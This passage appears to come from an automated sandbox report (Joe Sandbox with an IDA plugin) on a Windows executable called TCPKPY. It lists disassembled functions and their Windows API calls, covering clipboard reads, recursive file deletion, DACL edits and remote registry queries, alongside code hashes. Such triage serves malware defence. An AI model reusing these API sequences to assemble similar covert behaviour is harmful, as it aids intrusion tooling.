                                                                                                                • CloseClipboard.USER32 ref: 0025710B
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00257120
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0025712D
                                                                                                                • GetClipboardData.USER32(00000001), ref: 00257135
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00257142
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00257176
                                                                                                                • CloseClipboard.USER32 ref: 00257283
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 3222323430-0
                                                                                                                • Opcode ID: 15de8358e34d88055e4938649825e1ec8a0aa400d859423204573767dc3cd83c
                                                                                                                • Instruction ID: 7f787e46f75aa9937a4985467ed14a400862b8a7b3a00f94fb70caf57c22c791
                                                                                                                • Opcode Fuzzy Hash: 15de8358e34d88055e4938649825e1ec8a0aa400d859423204573767dc3cd83c
                                                                                                                • Instruction Fuzzy Hash: 2351B275258306ABD300FF60FC4AF6E77A8AF84B11F004519F946D61D2EB70D9198B66
                                                                                                                Function 0024FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0024FE03
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0024FE57
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024FE7C
                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024FE93
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0024FEBA
                                                                                                                • __swprintf.LIBCMT ref: 0024FF06
                                                                                                                • __swprintf.LIBCMT ref: 0024FF3F
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • __swprintf.LIBCMT ref: 0024FF93
                                                                                                                  • Part of subcall function 0022234B: __woutput_l.LIBCMT ref: 002223A4
                                                                                                                • __swprintf.LIBCMT ref: 0024FFE1
                                                                                                                • __swprintf.LIBCMT ref: 00250030
                                                                                                                • __swprintf.LIBCMT ref: 0025007F
                                                                                                                • __swprintf.LIBCMT ref: 002500CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                • API String ID: 108614129-2428617273
                                                                                                                • Opcode ID: 5a8d106ab6283483c87658e175edf7de80460d83da707806537ed0d01d5185b1
                                                                                                                • Instruction ID: b11635977ce039aad1512e0134173790a60207c8317b9ac498b4c7656d8e96dc
                                                                                                                • Opcode Fuzzy Hash: 5a8d106ab6283483c87658e175edf7de80460d83da707806537ed0d01d5185b1
                                                                                                                • Instruction Fuzzy Hash: 9FA131B2528344ABC314EFA4CC85DAFB7EDAF94700F44095DF595C2192EB34EA58CB62
                                                                                                                Function 00252044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00252065
                                                                                                                • _wcscmp.LIBCMT ref: 0025207A
                                                                                                                • _wcscmp.LIBCMT ref: 00252091
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 002520A3
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 002520BD
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 002520D5
                                                                                                                • FindClose.KERNEL32(00000000), ref: 002520E0
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 002520FC
                                                                                                                • _wcscmp.LIBCMT ref: 00252123
                                                                                                                • _wcscmp.LIBCMT ref: 0025213A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0025214C
                                                                                                                • SetCurrentDirectoryW.KERNEL32(002B3A68), ref: 0025216A
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00252174
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00252181
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00252191
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1803514871-438819550
                                                                                                                • Opcode ID: 0c0c8215f9bcab82496c585825bf34f02d6d9747834a41a527a23762c326970f
                                                                                                                • Instruction ID: ccb8c6312b180a56f33e5e0f2189539bdf9ac0fb9739a73aa952f9c107f3e25a
                                                                                                                • Opcode Fuzzy Hash: 0c0c8215f9bcab82496c585825bf34f02d6d9747834a41a527a23762c326970f
                                                                                                                • Instruction Fuzzy Hash: C031BE3651161AFACB10EFA4EC4CADE73AC9F06361F104156FD18E21D1DA70EA6CCB68
                                                                                                                Function 0025219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002521C0
                                                                                                                • _wcscmp.LIBCMT ref: 002521D5
                                                                                                                • _wcscmp.LIBCMT ref: 002521EC
                                                                                                                  • Part of subcall function 00247606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00247621
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0025221B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00252226
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00252242
                                                                                                                • _wcscmp.LIBCMT ref: 00252269
                                                                                                                • _wcscmp.LIBCMT ref: 00252280
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00252292
                                                                                                                • SetCurrentDirectoryW.KERNEL32(002B3A68), ref: 002522B0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 002522BA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 002522C7
                                                                                                                • FindClose.KERNEL32(00000000), ref: 002522D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: 80e240d86c4271f1452ad1dc7f205a32f5278365d8535f37108637b2609570c6
                                                                                                                • Instruction ID: ceee0923e5b384a61edceb277d96717c6d4acf96e6dedb8071d6be3282e59010
                                                                                                                • Opcode Fuzzy Hash: 80e240d86c4271f1452ad1dc7f205a32f5278365d8535f37108637b2609570c6
                                                                                                                • Instruction Fuzzy Hash: D3319D3991521ABACB14EEA4EC48ADA77AC9F06321F104155EC14E21D0DA719AADCF68
                                                                                                                Function 00206BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_memset
                                                                                                                • String ID: Q\E$[$\$\$\$]$^
                                                                                                                • API String ID: 3555123492-286096704
                                                                                                                • Opcode ID: 85dde4d5c8fc8e6dab5127f20717b9a1a4eb0d690e72051a7774b79b40eb578f
                                                                                                                • Instruction ID: 9a5cc1185b242479e215779bb5dd573362dfb2807dc1a9d4cbcbc3d4c02d13a4
                                                                                                                • Opcode Fuzzy Hash: 85dde4d5c8fc8e6dab5127f20717b9a1a4eb0d690e72051a7774b79b40eb578f
                                                                                                                • Instruction Fuzzy Hash: C672CE75D2121ACBDF28CF98C8847ADB7B1FF44314F2481A9D845AB382D774AEA5DB40
                                                                                                                Function 0022BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ac422656c20b0c1915db95bdee4e7c52775d9fab5cc7ec5a452a23ed53b32e58
                                                                                                                • Instruction ID: 2e73c8742751dd587065dabc9ab36836c887aa0276c0fed7787c8660bd09b513
                                                                                                                • Opcode Fuzzy Hash: ac422656c20b0c1915db95bdee4e7c52775d9fab5cc7ec5a452a23ed53b32e58
                                                                                                                • Instruction Fuzzy Hash: 82327E75A222299FCB248F94EC856EDB7B4FF46310F5440D9E40AE7A81D7709EA0CF52
                                                                                                                Function 0023B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
                                                                                                                  • Part of subcall function 0023B8E7: GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
                                                                                                                  • Part of subcall function 0023B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
                                                                                                                  • Part of subcall function 0023B8E7: HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
                                                                                                                  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
                                                                                                                  • Part of subcall function 0023B982: GetProcessHeap.KERNEL32(00000008,0023B3E1,00000000,00000000,?,0023B3E1,?), ref: 0023B98E
                                                                                                                  • Part of subcall function 0023B982: HeapAlloc.KERNEL32(00000000,?,0023B3E1,?), ref: 0023B995
                                                                                                                  • Part of subcall function 0023B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0023B3E1,?), ref: 0023B9A6
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0023B3FC
                                                                                                                • _memset.LIBCMT ref: 0023B411
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023B430
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 0023B441
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0023B47E
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0023B49A
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 0023B4B7
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0023B4C6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0023B4CD
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0023B4EE
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 0023B4F5
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023B526
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0023B54C
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023B560
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3996160137-0
                                                                                                                • Opcode ID: 043b323bab3baf5f55dea9bba892213bc3947f815fec52b9335849c5179e5076
                                                                                                                • Instruction ID: 959cb95f082bceafd6997e7f87f9035d16144b5e57ba02ea4a62e2058181f1cd
                                                                                                                • Opcode Fuzzy Hash: 043b323bab3baf5f55dea9bba892213bc3947f815fec52b9335849c5179e5076
                                                                                                                • Instruction Fuzzy Hash: 30512BB591020AAFDF01DFA4DC49AEEBB79FF04310F148129EA15AB291DB359A15CF60
                                                                                                                Function 00246E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
                                                                                                                • _wcscat.LIBCMT ref: 00246E7E
                                                                                                                • __wsplitpath.LIBCMT ref: 00246E99
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00246EAE
                                                                                                                • _wcscpy.LIBCMT ref: 00246EDD
                                                                                                                • _wcscat.LIBCMT ref: 00246EEF
                                                                                                                • _wcscat.LIBCMT ref: 00246F01
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00246F0E
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00246F22
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00246F3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2643075503-1173974218
                                                                                                                • Opcode ID: 39141e1c398bd197a281d24577b1fe06684882d270af016b250955de569aad0b
                                                                                                                • Instruction ID: e8ed3f0a9e21b0150bfa46344164aba037014fd014e9bf4f457d8a5e9f8cf909
                                                                                                                • Opcode Fuzzy Hash: 39141e1c398bd197a281d24577b1fe06684882d270af016b250955de569aad0b
                                                                                                                • Instruction Fuzzy Hash: B921D472419345AAC311EFA4E888DDBB7DC5F5A210F04091AF5D4C3051EA30D66C8B62
                                                                                                                Function 00205D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                • API String ID: 0-2893523900
                                                                                                                • Opcode ID: f6411a983165ee40d5d32c7d726900289492c8e6e073a889d4195c81b81c8d58
                                                                                                                • Instruction ID: 6a0ff1185971696202aebda4e3725f2d792d210072af0e881e5ea6c6fda398f9
                                                                                                                • Opcode Fuzzy Hash: f6411a983165ee40d5d32c7d726900289492c8e6e073a889d4195c81b81c8d58
                                                                                                                • Instruction Fuzzy Hash: FF62A2B5E2031A9BDF14DF58C8857AEB7B5BF48710F14816AE845EB2C2D7709E60CB90
                                                                                                                Function 002630AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026317F
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0026321E
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002632B6
                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002634F5
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00263502
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1240663315-0
                                                                                                                • Opcode ID: a8490a3b8765d614887830d15524d6235221a92b4c78c4569d5a1d0f33b9dc3f
                                                                                                                • Instruction ID: c149893d7eccec7cac76d8cfa6eed06a3299023ae34b6acc27e31969d86e1276
                                                                                                                • Opcode Fuzzy Hash: a8490a3b8765d614887830d15524d6235221a92b4c78c4569d5a1d0f33b9dc3f
                                                                                                                • Instruction Fuzzy Hash: A1E16C35614201AFC715DF24C895E2BBBE8EF89324B04856DF44ADB2A2DB30ED55CF51
                                                                                                                Function 00257294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: 36a09337f354b4e652d11829cdf12865fddea70f36d616e025a0896d875ec309
                                                                                                                • Instruction ID: e581bcb879275071edc84c246be198789326f60b54b301c59e967cf086d4985a
                                                                                                                • Opcode Fuzzy Hash: 36a09337f354b4e652d11829cdf12865fddea70f36d616e025a0896d875ec309
                                                                                                                • Instruction Fuzzy Hash: AE21B135265211AFD714AF20FC49F6D77A8EF14321F008015FD49DB2A2DB70E9648B84
                                                                                                                Function 0025C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023A857: CLSIDFromProgID.OLE32 ref: 0023A874
                                                                                                                  • Part of subcall function 0023A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 0023A88F
                                                                                                                  • Part of subcall function 0023A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0023A89D
                                                                                                                  • Part of subcall function 0023A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0023A8AD
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0025C6AD
                                                                                                                • _memset.LIBCMT ref: 0025C6BA
                                                                                                                • _memset.LIBCMT ref: 0025C7D8
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0025C804
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0025C80F
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 0025C85D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                • Opcode ID: b4285306a647c81adc820dc88824cd37d13080292147de07569ee45c6221b50c
                                                                                                                • Instruction ID: b31ecb22f56aabf07be1844d07eeeaa5f6ef69995b02528e4f0bcbc49e2b4570
                                                                                                                • Opcode Fuzzy Hash: b4285306a647c81adc820dc88824cd37d13080292147de07569ee45c6221b50c
                                                                                                                • Instruction Fuzzy Hash: BA915B71D10318AFDB10DFA4DC85EDEBBB9AF08710F20412AF915A7281EB705A59CFA0
                                                                                                                Function 002524A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002524F6
                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00252526
                                                                                                                • _wcscmp.LIBCMT ref: 0025253A
                                                                                                                • _wcscmp.LIBCMT ref: 00252555
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002525F3
